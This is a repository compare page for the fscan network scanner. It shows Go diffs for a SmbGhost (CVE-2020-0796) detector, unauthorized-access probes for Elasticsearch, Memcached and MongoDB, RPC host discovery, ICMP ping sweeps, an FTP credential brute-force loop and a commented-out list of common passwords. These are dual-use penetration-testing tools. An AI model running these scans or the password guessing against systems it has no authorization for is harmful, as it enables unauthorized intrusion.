source/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2026-02-09 18:29:17 +08:00
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: source:1.1
Branches Tags
source:main source:dev source:dev-2.1.1 source:dev-2.1.2 source:1.8.4-bak
source:v2.0.2 source:v2.0.1 source:2.0.0 source:1.8.4 source:1.8.3-build3 source:1.8.3-build2 source:1.8.3-build source:1.8.3 source:1.8.2 source:1.8.1 source:1.8.0 source:1.7.1 source:1.6.3 source:1.6.2 source:1.6.1 source:1.6.0 source:1.5.1 source:1.5 source:1.4 source:1.3.1 source:1.3 source:1.2 source:1.1 source:1.0
...
compare: source:1.4
Branches Tags
source:dev source:dev-2.1.1 source:dev-2.1.2 source:main source:1.8.4-bak
source:v2.0.2 source:v2.0.1 source:2.0.0 source:1.8.4 source:1.8.3-build3 source:1.8.3-build2 source:1.8.3-build source:1.8.3 source:1.8.2 source:1.8.1 source:1.8.0 source:1.7.1 source:1.6.3 source:1.6.2 source:1.6.1 source:1.6.0 source:1.5.1 source:1.5 source:1.4 source:1.3.1 source:1.3 source:1.2 source:1.1 source:1.0

29 Commits
1.1 ... 1.4

Author SHA1 Message Date
shadow1ng
7742b1f35b 已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试 2020-12-12 13:58:02 +08:00
shadow1ng
c27eccbcc9 Merge remote-tracking branch 'origin/main' into main 
# Conflicts:
#	README.md
 2020-12-06 10:51:53 +08:00
shadow1ng
90b848a3dc 优化icmp模块,新增-domain 参数(用于smb爆破模块,适用于域用户) 2020-12-06 10:50:47 +08:00
shadow1ng
767fff84ed 优化icmp模块,新增-domain 参数(用于smb爆破模块,适用于域用户) 2020-12-06 10:50:40 +08:00
shadow1ng
b4fb1efb3a 优化icmp模块 2020-12-05 16:57:01 +08:00
影舞者
c4d1cd950a Update README.md 2020-12-03 23:24:21 +08:00
shadow1ng
818102a814 优化ip段处理模块、端口扫描模块。 2020-12-03 23:20:39 +08:00
shadow1ng
b00a5d4403 优化参数处理 2020-12-03 17:02:21 +08:00
shadow1ng
f638d3a1e2 优化ip段处理模块,新增支持192.168.1.1-192.168.255.255 2020-12-03 16:00:40 +08:00
shadow1ng
8ca4d2c89a 优化ip段处理模块,新增支持192.168.1.1-192.168.255.255 2020-12-03 15:55:29 +08:00
shadow1ng
13a3cacd93 mac下修改ping所需的bash路径,改为/bin/bash。(原为/usr/local/bin/bash),并把超时参数由-w 改为-W。 2020-11-17 16:04:56 +08:00
shadow1ng
3282f4abcb Merge remote-tracking branch 'origin/main' into main 2020-11-17 15:49:33 +08:00
shadow1ng
0cff8351ac 修改mac下ping所需的bash路径,改为/bin/bash。(原为/usr/local/bin/bash) 2020-11-17 15:48:53 +08:00
影舞者
cd29281e72 Update README.md 2020-11-17 14:31:38 +08:00
shadow1ng
db028ba0cc 增加-ping 参数,作用是存活探测模块用ping代替icmp发包。 2020-11-17 14:27:15 +08:00
shadow1ng
2026b5f587 新增shiro识别 2020-11-17 13:23:58 +08:00
shadow1ng
ce657e22a9 新增shiro识别 2020-11-17 13:22:49 +08:00
shadow1ng
d96b0c0ad0 update 2020-11-17 13:16:05 +08:00
shadow1ng
a33ed4cfeb update 2020-11-17 13:15:08 +08:00
影舞者
30c1f267c2 Delete fscan 2020-11-17 11:26:33 +08:00
影舞者
faae9c7870 Merge pull request #4 from v1xingyue/main 
如下简单代码修改 方便编译
1.使用 go mod 创建项目
2.使用 import 绝对路径,代替 相对路径
推荐编译命令,生成的文件更小
go build -ldflags="-s -w " -trimpath -gcflags=-trimpath=$GOPATH -asmflags=-trimpath=$GOPATH
 2020-11-17 11:25:29 +08:00
v1xingyue
57349aab7b 1. 使用 go mod 创建项目 
2. 使用 import 绝对路径,代替 相对路径
 2020-11-17 10:35:27 +08:00
shadow1ng
33121ead42 update 2020-11-17 00:27:23 +08:00
shadow1ng
12f9e6ed62 update 2020-11-17 00:22:57 +08:00
shadow1ng
1a8b884d63 update icmp threads 2020-11-16 19:55:11 +08:00
shadow1ng
468c2a0ff9 update icmp threads 2020-11-16 19:55:00 +08:00
shadow1ng
f8285de94d update 2020-11-16 13:17:59 +08:00
shadow1ng
8dc8b6e652 update 2020-11-16 09:51:41 +08:00
shadow1ng
a1900086d6 update 2020-11-15 23:36:53 +08:00
27 changed files with 1016 additions and 920 deletions
Expand all files Collapse all files

171
Plugins/CVE-2020-0796.go
View File

@@ -1,113 +1,110 @@
package Plugins
//Ladon Scanner for golang
//Author: k8gege
//K8Blog: http://k8gege.org
//Github: https://github.com/k8gege
import (
"../common"
"bytes"
"fmt"
"net"
"sync"
"time"
"github.com/shadow1ng/fscan/common"
)
const (
pkt =
"\x00" + // session
"\x00\x00\xc0"+ // legth
pkt = "\x00" + // session
"\x00\x00\xc0" + // legth
"\xfeSMB@\x00"+ // protocol
"\xfeSMB@\x00" + // protocol
//[MS-SMB2]: SMB2 NEGOTIATE Request
//https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e14db7ff-763a-4263-8b10-0c3944f52fc5
//[MS-SMB2]: SMB2 NEGOTIATE Request
//https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e14db7ff-763a-4263-8b10-0c3944f52fc5
"\x00\x00" +
"\x00\x00" +
"\x00\x00" +
"\x00\x00" +
"\x1f\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00" +
"\x00\x00" +
"\x00\x00" +
"\x00\x00" +
"\x1f\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
// [MS-SMB2]: SMB2 NEGOTIATE_CONTEXT
// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/15332256-522e-4a53-8cd7-0bd17678a2f7
// [MS-SMB2]: SMB2 NEGOTIATE_CONTEXT
// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/15332256-522e-4a53-8cd7-0bd17678a2f7
"$\x00" +
"\x08\x00" +
"\x01\x00" +
"\x00\x00" +
"\x7f\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"x\x00" +
"\x00\x00" +
"\x02\x00" +
"\x00\x00" +
"\x02\x02" +
"\x10\x02" +
"\x22\x02" +
"$\x02" +
"\x00\x03" +
"\x02\x03" +
"\x10\x03" +
"\x11\x03" +
"\x00\x00\x00\x00" +
"$\x00" +
"\x08\x00" +
"\x01\x00" +
"\x00\x00" +
"\x7f\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"x\x00" +
"\x00\x00" +
"\x02\x00" +
"\x00\x00" +
"\x02\x02" +
"\x10\x02" +
"\x22\x02" +
"$\x02" +
"\x00\x03" +
"\x02\x03" +
"\x10\x03" +
"\x11\x03" +
"\x00\x00\x00\x00" +
// [MS-SMB2]: SMB2_PREAUTH_INTEGRITY_CAPABILITIES
// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/5a07bd66-4734-4af8-abcf-5a44ff7ee0e5
// [MS-SMB2]: SMB2_PREAUTH_INTEGRITY_CAPABILITIES
// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/5a07bd66-4734-4af8-abcf-5a44ff7ee0e5
"\x01\x00" +
"&\x00" +
"\x00\x00\x00\x00" +
"\x01\x00" +
"\x20\x00" +
"\x01\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00" +
"\x01\x00" +
"&\x00" +
"\x00\x00\x00\x00" +
"\x01\x00" +
"\x20\x00" +
"\x01\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x00\x00" +
// [MS-SMB2]: SMB2_COMPRESSION_CAPABILITIES
// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271
// [MS-SMB2]: SMB2_COMPRESSION_CAPABILITIES
// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271
"\x03\x00" +
"\x0e\x00" +
"\x00\x00\x00\x00" +
"\x01\x00" + //CompressionAlgorithmCount
"\x00\x00" +
"\x01\x00\x00\x00" +
"\x01\x00" + //LZNT1
"\x00\x00" +
"\x00\x00\x00\x00"
"\x03\x00" +
"\x0e\x00" +
"\x00\x00\x00\x00" +
"\x01\x00" + //CompressionAlgorithmCount
"\x00\x00" +
"\x01\x00\x00\x00" +
"\x01\x00" + //LZNT1
"\x00\x00" +
"\x00\x00\x00\x00"
)
func SmbGhost(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
func SmbGhost(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
SmbGhostScan(info)
wg.Done()
<- ch
<-ch
}
func SmbGhostScan(info *common.HostInfo) {
ip,port,timeout := info.Host,445,time.Duration(info.Timeout)*time.Second
addr:=fmt.Sprintf("%s:%d",info.Host,port)
ip, port, timeout := info.Host, 445, time.Duration(info.Timeout)*time.Second
addr := fmt.Sprintf("%s:%d", info.Host, port)
conn, err := net.DialTimeout("tcp", addr, timeout)
if err != nil {
return
@@ -118,10 +115,10 @@ func SmbGhostScan(info *common.HostInfo) {
n, err := conn.Read(buff)
if err != nil {
return
}else {
} else {
defer conn.Close()
if bytes.Contains([]byte(buff[:n]), []byte("Public")) == true {
result := fmt.Sprintf("%v CVE-2020-0796 SmbGhost Vulnerable",ip)
result := fmt.Sprintf("%v CVE-2020-0796 SmbGhost Vulnerable", ip)
common.LogSuccess(result)
}
}

36
Plugins/base.go
View File

@@ -14,39 +14,5 @@ var PluginList = map[string]interface{}{
"27017":MongodbScan,
"1000001": MS17010,
"1000002": SmbGhost,
//"WebTitle":WebTitle,
"1000003":WebTitle,
}
//var Passwords = []string{"admin123A","123456","admin","root","password","123123","123","1","{user}","{user}{user}","{user}1","{user}123","{user}2016","{user}2015","{user}!","","P@ssw0rd!!","qwa123","12345678","test","123qwe!@#","123456789","123321","1314520","666666","woaini","fuckyou","000000","1234567890","8888888","qwerty","1qaz2wsx","abc123","abc123456","1q2w3e4r","123qwe","p@ssw0rd","p@55w0rd","password!","p@ssw0rd!","password1","r00t","tomcat","apache","system","huawei","admin123","zte"}
//const Username = "admin"
//const Password = "123456"
//const Timeout = 3 * time.Second
//const FTPPORT = 21
//const SSHPORT = 22
//const MEMCACHEDPORT = 11211
//const MONGODBPORT = 27017
//const MSSQLPORT = 1433
//const OraclePORT = 1433
//const PSQLPORT = 5432
//const REDISPORT = 6379
//const MYSQLPORT = 3306
//const SMBPORT = 445
//const POSTGRESPORT = 5432
//var PluginList = map[string]interface{}{
// "ftp": FtpScan,
// "mysql": MysqlScan,
// //"mongodb":MgoConn,
// "mssql":MssqlScan,
// "redis": RedisScan,
// //"smb": SmbScan,
// "ssh": SshScan,
// //"portscan": PortConn,
// //"icmp": IcmpConn,
// "postgresql": PostgresScan,
// //"urlscan":UrlConn,
// //"auth":ApacheConn,
// //"subdomain":SDConn,
// //"memcached":MemConn,
//}

61
Plugins/elasticsearch.go
View File

@@ -1,7 +1,6 @@
package Plugins
import (
"../common"
"fmt"
"io/ioutil"
"net"
@@ -9,63 +8,47 @@ import (
"strings"
"sync"
"time"
"github.com/shadow1ng/fscan/common"
)
func elasticsearchScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
func elasticsearchScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
geturl2(info)
wg.Done()
wg.Done()
<-ch
}
func geturl2(info *common.HostInfo) (flag bool,err error) {
func geturl2(info *common.HostInfo) (flag bool, err error) {
flag = false
url := fmt.Sprintf("%s:%d/_cat",info.Url,common.PORTList["elastic"])
url := fmt.Sprintf("%s:%d/_cat", info.Url, common.PORTList["elastic"])
var client = &http.Client{
Transport:&http.Transport{
DialContext:(&net.Dialer{
Timeout:time.Duration(info.Timeout)*time.Second,
Transport: &http.Transport{
DialContext: (&net.Dialer{
Timeout: time.Duration(info.Timeout) * time.Second,
}).DialContext,
},
CheckRedirect:func(req *http.Request, via []*http.Request) error{
CheckRedirect: func(req *http.Request, via []*http.Request) error {
return http.ErrUseLastResponse
},
}
res,err:=http.NewRequest("GET",url,nil)
if err==nil{
res.Header.Add("User-agent","Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
res.Header.Add("Accept","*/*")
res.Header.Add("Accept-Language","zh-CN,zh;q=0.9")
res.Header.Add("Accept-Encoding","gzip, deflate")
res.Header.Add("Connection","close")
resp,err:=client.Do(res)
res, err := http.NewRequest("GET", url, nil)
if err == nil {
res.Header.Add("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
res.Header.Add("Accept", "*/*")
res.Header.Add("Accept-Language", "zh-CN,zh;q=0.9")
res.Header.Add("Accept-Encoding", "gzip, deflate")
res.Header.Add("Connection", "close")
resp, err := client.Do(res)
if err==nil{
if err == nil {
defer resp.Body.Close()
body, _ := ioutil.ReadAll(resp.Body)
if strings.Contains(string(body),"/_cat/master"){
result := fmt.Sprintf("Elastic:%s unauthorized",url)
if strings.Contains(string(body), "/_cat/master") {
result := fmt.Sprintf("Elastic:%s unauthorized", url)
common.LogSuccess(result)
flag = true
}
}
}
return flag,err
//fmt.Print("\n")
return flag, err
}
//if info.Cookie!=""{
// res.Header.Add("Cookie",info.Cookie)
//}
//if info.Header!=""{
// var header = make(map[string]string)
// err:=json.Unmarshal([]byte(info.Header),&header)
// if err!=nil{
// Misc.CheckErr(err)
// }
// for k,v:=range header{
// res.Header.Add(k,v)
// }
//}

43
Plugins/findnet.go
View File

@@ -11,33 +11,33 @@ import (
"fmt"
"sync"
"../common"
"github.com/shadow1ng/fscan/common"
)
var (
buffer_v1, _ = hex.DecodeString("05000b03100000004800000001000000b810b810000000000100000000000100c4fefc9960521b10bbcb00aa0021347a00000000045d888aeb1cc9119fe808002b10486002000000")
buffer_v2, _ = hex.DecodeString("050000031000000018000000010000000000000000000500")
buffer_v3, _ = hex.DecodeString("0900ffff0000")
buffer_v1, _ = hex.DecodeString("05000b03100000004800000001000000b810b810000000000100000000000100c4fefc9960521b10bbcb00aa0021347a00000000045d888aeb1cc9119fe808002b10486002000000")
buffer_v2, _ = hex.DecodeString("050000031000000018000000010000000000000000000500")
buffer_v3, _ = hex.DecodeString("0900ffff0000")
)
func Findnet(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
func Findnet(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
FindnetScan(info)
wg.Done()
<- ch
<-ch
}
func FindnetScan(info *common.HostInfo) {
realhost:=fmt.Sprintf("%s:%d",info.Host,135)
conn,err := net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
if err != nil{
realhost := fmt.Sprintf("%s:%d", info.Host, 135)
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
if err != nil {
return
}
conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout)*time.Second))
conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
defer conn.Close()
conn.Write(buffer_v1)
reply := make([]byte, 4096)
_, err = conn.Read(reply)
if err != nil{
if err != nil {
return
}
conn.Write(buffer_v2)
@@ -47,32 +47,29 @@ func FindnetScan(info *common.HostInfo) {
text := reply[42:]
flag := true
for i := 0; i < len(text)-5; i++ {
if bytes.Equal(text[i:i+6], buffer_v3){
if bytes.Equal(text[i:i+6], buffer_v3) {
text = text[:i-4]
flag = false
break
}
}
if flag{
if flag {
return
}
read(text,info.Host)
read(text, info.Host)
}
func read(text []byte,host string) {
func read(text []byte, host string) {
encodedStr := hex.EncodeToString(text)
hostnames := strings.Replace(encodedStr, "0700", "", -1)
hostname := strings.Split(hostnames, "000000")
result := "NetInfo:\n[*]"+host
result := "NetInfo:\n[*]" + host
for i := 0; i < len(hostname); i++ {
hostname[i] = strings.Replace(hostname[i], "00", "", -1)
host,err := hex.DecodeString(hostname[i])
if err != nil{
host, err := hex.DecodeString(hostname[i])
if err != nil {
return
}
result += "\n [->]"+string(host)
//result += "\n ["+string(host)+"]"
result += "\n [->]" + string(host)
}
common.LogSuccess(result)
}

33
Plugins/ftp.go
View File

@@ -1,41 +1,42 @@
package Plugins
import (
"../common"
"github.com/jlaffaye/ftp"
"fmt"
"strings"
"sync"
"time"
"github.com/jlaffaye/ftp"
"github.com/shadow1ng/fscan/common"
)
func FtpScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
Loop:
for _,user:=range common.Userdict["ftp"]{
for _,pass:=range common.Passwords{
func FtpScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
Loop:
for _, user := range common.Userdict["ftp"] {
for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", string(user), -1)
flag,err := FtpConn(info,user,pass,ch,wg)
if flag==true && err==nil {
flag, err := FtpConn(info, user, pass)
if flag == true && err == nil {
break Loop
}
}
}
wg.Done()
<- ch
<-ch
}
func FtpConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
func FtpConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host,Port,Username,Password := info.Host, common.PORTList["ftp"],user, pass
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v",Host,Port), time.Duration(info.Timeout)*time.Second)
Host, Port, Username, Password := info.Host, common.PORTList["ftp"], user, pass
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(info.Timeout)*time.Second)
if err == nil {
err = conn.Login(Username,Password)
err = conn.Login(Username, Password)
if err == nil {
defer conn.Logout()
result := fmt.Sprintf("FTP:%v:%v:%v %v",Host,Port,Username,Password)
result := fmt.Sprintf("FTP:%v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result)
flag = true
}
}
return flag,err
}
return flag, err
}

176
Plugins/icmp.go
View File

@@ -2,7 +2,6 @@ package Plugins
import (
"bytes"
"encoding/binary"
"fmt"
"net"
"os"
@@ -14,26 +13,18 @@ import (
"time"
)
var icmp ICMP
var AliveHosts []string
type ICMP struct {
Type uint8
Code uint8
Checksum uint16
Identifier uint16
SequenceNum uint16
}
var SysInfo = GetSys()
type SystemInfo struct {
OS string
ARCH string
HostName string
Groupid string
Userid string
Username string
UserHomeDir string
OS string
ARCH string
HostName string
Groupid string
Userid string
Username string
UserHomeDir string
}
func GetSys() SystemInfo {
@@ -56,120 +47,97 @@ func GetSys() SystemInfo {
}
func isping(ip string) bool {
icmp.Type = 8
icmp.Code = 0
icmp.Checksum = 0
icmp.Identifier = 0
icmp.SequenceNum = 0
recvBuf := make([]byte, 32)
var buffer bytes.Buffer
binary.Write(&buffer, binary.BigEndian, icmp)
icmp.Checksum = CheckSum(buffer.Bytes())
buffer.Reset()
binary.Write(&buffer, binary.BigEndian, icmp)
Time, _ := time.ParseDuration("2s")
IcmpByte := []byte{8, 0, 247, 255, 0, 0, 0, 0}
Time, _ := time.ParseDuration("3s")
conn, err := net.DialTimeout("ip4:icmp", ip, Time)
if err != nil {
return false
}
_, err = conn.Write(buffer.Bytes())
if err != nil {
return false
}
conn.SetReadDeadline(time.Now().Add(time.Second * 2))
num, err := conn.Read(recvBuf)
defer conn.Close()
_, err = conn.Write(IcmpByte)
if err != nil {
return false
}
conn.SetReadDeadline(time.Time{})
if err := conn.SetReadDeadline(time.Now().Add(time.Second * 3)); err != nil {
return false
}
recvBuf := make([]byte, 40)
num, err := conn.Read(recvBuf[0:40])
if err != nil {
return false
}
if err := conn.SetReadDeadline(time.Time{}); err != nil {
return false
}
if string(recvBuf[0:num]) != "" {
fmt.Printf("(ICMP) Target '%s' is alive\n",ip)
fmt.Printf("(ICMP) Target '%s' is alive\n", ip)
return true
}
return false
}
func CheckSum(data []byte) uint16 {
var (
sum uint32
length int = len(data)
index int
)
for length > 1 {
sum += uint32(data[index])<<8 + uint32(data[index+1])
index += 2
length -= 2
}
if length > 0 {
sum += uint32(data[index])
}
sum += (sum >> 16)
return uint16(^sum)
}
func IcmpCheck(hostslist []string) {
func IcmpCheck(hostslist []string, IcmpThreads int) {
var wg sync.WaitGroup
mutex := &sync.Mutex{}
for _,host :=range hostslist{
limiter := make(chan struct{}, IcmpThreads)
for _, host := range hostslist {
wg.Add(1)
limiter <- struct{}{}
go func(host string) {
defer wg.Done()
if isping(host){
if isping(host) {
mutex.Lock()
AliveHosts = append(AliveHosts, host)
mutex.Unlock()
}
<-limiter
}(host)
}
wg.Wait()
}
func ExecCommandPing(ip string,bsenv string) bool {
command := exec.Command(bsenv, "-c", "ping -c 1 -w 1 "+ip+" >/dev/null && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
func ExecCommandPing(ip string, bsenv string) bool {
var command *exec.Cmd
if SysInfo.OS == "windows" {
command = exec.Command("cmd", "/c", "ping -n 1 -w 1 "+ip+" && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
} else if SysInfo.OS == "linux" {
command = exec.Command(bsenv, "-c", "ping -c 1 -w 1 "+ip+" >/dev/null && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
} else if SysInfo.OS == "darwin" {
command = exec.Command(bsenv, "-c", "ping -c 1 -W 1 "+ip+" >/dev/null && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
}
outinfo := bytes.Buffer{}
command.Stdout = &outinfo
err := command.Start()
if err != nil{
if err != nil {
return false
}
if err = command.Wait();err!=nil{
if err = command.Wait(); err != nil {
return false
}else{
if(strings.Contains(outinfo.String(), "true")) {
} else {
if strings.Contains(outinfo.String(), "true") {
return true
}else {
} else {
return false
}
}
}
func PingCMDcheck(hostslist []string,bsenv string) {
func PingCMDcheck(hostslist []string, bsenv string) {
var wg sync.WaitGroup
mutex := &sync.Mutex{}
limiter := make(chan struct{}, 40)
//aliveHost := make(chan string, 20)
//go func() {
// for s := range aliveHost {
// fmt.Println(s)
// }
//}()
for _,host :=range hostslist{
for _, host := range hostslist {
wg.Add(1)
limiter <- struct{}{}
go func(host string) {
defer wg.Done()
if ExecCommandPing(host,bsenv){
if ExecCommandPing(host, bsenv) {
mutex.Lock()
fmt.Printf("(Ping) Target '%s' is alive\n",host)
fmt.Printf("(Ping) Target '%s' is alive\n", host)
AliveHosts = append(AliveHosts, host)
mutex.Unlock()
}
@@ -177,26 +145,38 @@ func PingCMDcheck(hostslist []string,bsenv string) {
}(host)
}
wg.Wait()
//close(aliveHost)
}
func ICMPRun(hostslist []string, IcmpThreads int, Ping bool) []string {
func ICMPRun(hostslist []string) []string{
var sysinfo SystemInfo
sysinfo = GetSys()
if sysinfo.OS == "windows" {
IcmpCheck(hostslist)
}else if sysinfo.OS == "linux" {
if (sysinfo.Groupid == "0" || sysinfo.Userid == "0" || sysinfo.Username == "root") {
IcmpCheck(hostslist)
}else {
PingCMDcheck(hostslist,"/bin/bash")
if SysInfo.OS == "windows" {
if Ping == false {
IcmpCheck(hostslist, IcmpThreads)
} else {
PingCMDcheck(hostslist, "")
}
}else if sysinfo.OS == "darwin" {
if (sysinfo.Groupid == "0" || sysinfo.Userid == "0" || sysinfo.Username == "root") {
IcmpCheck(hostslist)
}else {
PingCMDcheck(hostslist,"/usr/local/bin/bash")
} else if SysInfo.OS == "linux" {
if SysInfo.Groupid == "0" || SysInfo.Userid == "0" || SysInfo.Username == "root" {
if Ping == false {
IcmpCheck(hostslist, IcmpThreads)
} else {
PingCMDcheck(hostslist, "/bin/bash")
}
} else {
fmt.Println("The current user permissions unable to send icmp packets")
fmt.Println("start ping")
PingCMDcheck(hostslist, "/bin/bash")
}
} else if SysInfo.OS == "darwin" {
if SysInfo.Groupid == "0" || SysInfo.Userid == "0" || SysInfo.Username == "root" {
if Ping == false {
IcmpCheck(hostslist, IcmpThreads)
} else {
PingCMDcheck(hostslist, "/bin/bash")
}
} else {
fmt.Println("The current user permissions unable to send icmp packets")
fmt.Println("start ping")
PingCMDcheck(hostslist, "/bin/bash")
}
}
return AliveHosts

17
Plugins/memcached.go
View File

@@ -1,31 +1,32 @@
package Plugins
import (
"../common"
"fmt"
"net"
"strings"
"sync"
"time"
"github.com/shadow1ng/fscan/common"
)
func MemcachedScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) (err error, result string) {
realhost:=fmt.Sprintf("%s:%d",info.Host,common.PORTList["mem"])
client,err:=net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
if err==nil {
client.SetDeadline(time.Now().Add(time.Duration(info.Timeout)*time.Second))
func MemcachedScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) (err error, result string) {
realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["mem"])
client, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
if err == nil {
client.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
rev := make([]byte, 1024)
n, err := client.Read(rev)
if err == nil {
if strings.Contains(string(rev[:n]), "STAT") {
defer client.Close()
result = fmt.Sprintf("Memcached:%s unauthorized",realhost)
result = fmt.Sprintf("Memcached:%s unauthorized", realhost)
common.LogSuccess(result)
}
}
}
wg.Done()
<- ch
<-ch
return err, result
}

38
Plugins/mongodb.go
View File

@@ -1,49 +1,51 @@
package Plugins
import (
"../common"
"fmt"
_ "github.com/denisenkom/go-mssqldb"
"net"
"strings"
"sync"
"time"
_ "github.com/denisenkom/go-mssqldb"
"github.com/shadow1ng/fscan/common"
)
func MongodbScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
func MongodbScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
MongodbUnauth(info)
wg.Done()
<- ch
<-ch
}
func MongodbUnauth(info *common.HostInfo) (flag bool,err error) {
func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
flag = false
send_data := []byte{58,0,0,0,167,65,0,0,0,0,0,0,212,7,0,0,0,0,0,0,97,100,109,105,110,46,36,99,109,100,0,0,0,0,0,255,255,255,255,19,0,0,0,16,105,115,109,97,115,116,101,114,0,1,0,0,0,0}
getlog_data := []byte{72,0,0,0,2,0,0,0,0,0,0,0,212,7,0,0,0,0,0,0,97,100,109,105,110,46,36,99,109,100,0,0,0,0,0,1,0,0,0,33,0,0,0,2,103,101,116,76,111,103,0,16,0,0,0,115,116,97,114,116,117,112,87,97,114,110,105,110,103,115,0,0}
realhost:=fmt.Sprintf("%s:%d",info.Host,common.PORTList["mgo"])
conn,err := net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
if err != nil{return}
send_data := []byte{58, 0, 0, 0, 167, 65, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 255, 255, 255, 255, 19, 0, 0, 0, 16, 105, 115, 109, 97, 115, 116, 101, 114, 0, 1, 0, 0, 0, 0}
getlog_data := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["mgo"])
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
if err != nil {
return
}
defer conn.Close()
conn.Write(send_data)
buf := make([]byte, 1024)
count, err := conn.Read(buf)
if err != nil {
return flag,err
return flag, err
}
text := string(buf[0:count])
if strings.Contains(text,"ismaster"){
if strings.Contains(text, "ismaster") {
conn.Write(getlog_data)
count, err := conn.Read(buf)
if err != nil {
return flag,err
return flag, err
}
text := string(buf[0:count])
if strings.Contains(text,"totalLinesWritten"){
if strings.Contains(text, "totalLinesWritten") {
flag = true
result := fmt.Sprintf("Mongodb:%v unauthorized",realhost)
result := fmt.Sprintf("Mongodb:%v unauthorized", realhost)
